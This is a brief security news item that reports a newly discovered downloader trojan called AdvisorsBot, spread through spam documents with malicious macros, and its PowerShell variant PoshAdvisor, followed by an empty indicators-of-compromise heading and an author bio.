Security researchers have discovered a new C-based downloader trojan known as AdvisorsBot targeting governmental, telecommunications and leisure organisations.
AdvisorsBot is being distributed through large-scale spam campaigns using several different lure documents. These documents contain malicious macros that execute a PowerShell script to download and install AdvisorsBot.
Once installed, AdvisorsBot has much of the same functionality as the Marap downloader, including collecting user and system information before connecting to a command and control server.
An alternate version of AdvisorsBot, known as PoshAdvisor, also exists. Rewritten in PowerShell and .NET, it has the same functionality as AdvisorsBot.
Like most modern malware, AdvisorsBot employs a number of anti-analysis features. One of the most effective is the use of junk code–such as extra instructions, conditional statements, and loops–to considerably slow down reverse engineering.
Read a full report on this here
Indicators Of Compromise
SHA256 File Hashes
Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.